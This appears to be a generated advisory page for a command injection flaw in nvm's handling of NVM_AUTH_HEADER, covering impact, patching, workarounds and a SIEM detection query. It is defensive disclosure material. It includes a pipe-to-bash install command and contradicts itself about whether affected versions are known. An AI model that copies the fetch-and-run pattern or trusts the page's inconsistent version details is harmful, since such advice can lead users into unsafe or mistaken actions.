CVE-2026-1665
📋 TL;DR
This CVE describes a command injection vulnerability in nvm (Node Version Manager) where the NVM_AUTH_HEADER environment variable is not properly sanitized when used in wget commands. Attackers who can set environment variables in a victim's shell environment can execute arbitrary shell commands when the victim runs nvm commands that trigger downloads. This affects users of nvm versions 0.40.3 and below.
💻 Affected Systems
- nvm (Node Version Manager)
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with arbitrary command execution as the user running nvm, potentially leading to data theft, ransomware deployment, or lateral movement within the environment.
Likely Case
Local privilege escalation or execution of malicious scripts in CI/CD pipelines, development environments, or Docker containers where environment variables can be controlled.
If Mitigated
Limited impact if proper environment variable controls and least privilege principles are enforced, with attackers unable to set arbitrary environment variables.
🎯 Exploit Status
Exploitation requires ability to set environment variables in the target shell environment, which could be achieved through compromised CI/CD configurations, malicious dotfiles, or Docker images.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v0.40.4
Vendor Advisory: https://github.com/nvm-sh/nvm/releases/tag/v0.40.4
Restart Required: No
Instructions:
1. Update nvm using: curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.4/install.sh | bash
2. Or manually update by pulling the latest version from the nvm repository
3. Restart your terminal session to ensure the updated version is loaded
🔧 Temporary Workarounds
Force curl download method
allConfigure nvm to use curl instead of wget for downloads, as the curl code path properly sanitizes the NVM_AUTH_HEADER variable
export NVM_AUTH_HEADER=""
export NVM_DOWNLOAD_TOOL="curl"
Unset vulnerable environment variable
allRemove the NVM_AUTH_HEADER environment variable from shell configurations
unset NVM_AUTH_HEADER
🧯 If You Can't Patch
- Restrict environment variable modification in CI/CD pipelines and Docker containers
- Implement least privilege principles and monitor for suspicious nvm command execution
🔍 How to Verify
Check if Vulnerable:
Check nvm version with: nvm --version. If version is 0.40.3 or below, the system is vulnerable.Check Version:
nvm --versionVerify Fix Applied:
After updating, verify with: nvm --version. Should show 0.40.4 or higher.📡 Detection & Monitoring
Log Indicators:
- Unusual shell commands executed during nvm operations
- Suspicious environment variables set before nvm commands
Network Indicators:
- Unexpected outbound connections during nvm download operations
SIEM Query:
process.name:"bash" AND command_line:"*nvm*" AND (command_line:"*wget*" OR command_line:"*curl*")